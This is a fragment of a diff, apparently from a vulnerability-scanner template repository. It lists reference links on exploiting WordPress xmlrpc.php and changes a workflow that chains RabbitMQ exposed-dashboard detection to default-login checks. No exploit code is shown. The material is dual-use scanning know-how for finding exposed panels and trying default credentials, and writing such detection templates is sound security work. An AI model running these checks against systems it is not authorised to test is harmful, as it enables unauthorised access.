- https://github.com/dorkerdevil/rpckiller
|
||||
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
|
||||
|
|
|
@ -9,4 +9,4 @@ workflows:
|
|||
- template: exposed-panels/rabbitmq-dashboard.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: default-logins/rabbitmq/rabbitmq-default-admin.yaml
|
||||
- template: default-logins/rabbitmq/
|